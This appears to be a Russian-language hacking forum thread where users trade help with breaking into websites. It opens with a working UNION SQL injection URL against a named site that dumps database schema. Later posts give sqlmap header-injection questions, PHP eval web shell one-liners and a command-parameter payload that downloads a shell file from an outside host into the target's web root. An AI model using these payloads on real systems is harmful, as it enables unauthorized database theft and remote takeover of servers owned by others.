http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,concat_ws(0x03a,table_schema,table_name,column_name),3,4,5,6,7,8,9,10,11,12,13,14+from+`information_schema`.columns)+--+
Может да, а может и нет. Только так можно ответить на подобные вопросы, где не раскрываются ни название скрипта, ни url, ни что-либо ещё... З.Ы. Сильно помогло ?
Привет! Почему я в FF делаю запрос к БД со скобками "user()" и браузер фильтрует их преобразовывая в "user #45005232991653576411" и запрос не получается. В то время через оперу все нормально. Как это обойти? ЗЫ Установил в FF хакбар, как только не кодирую серавно запрос не проходит
Спасибо! Но этот вариант мне известен. Неучто все тестируют изпод старых браузеров? Ты каким пользуешься?
Как с помощью sqlmap раскрутить sqli через http заголовки? Если вбиваю --header=X-Forwarded-For: то не прокатывает... Помогите плиз. Мне надо исключительно с помощью sqlmap.
Code: http://target/evil.php?cmd=<пхп функция> http://target/evil.php?cmd=phpinfo(); http://target/evil.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://evilsite.ru/shell.txt&o=shell.php Либо echo '<?php eval($_GET[\'cmd\']) ?>' > shell.php
Это происходит при попытке залить шелл с таким кодом? Code: <?php eval($_GET[cmd]); ?> Либо на этом шаге? Code: echo '<?php eval($_GET[\'cmd\']) ?>' > 666.php
Есть шелл. На шелле я создал файл php с содержимым "<?php eval($_GET[cmd]); ?>" Ошибка эта даже при попытке вывести phpinfo.
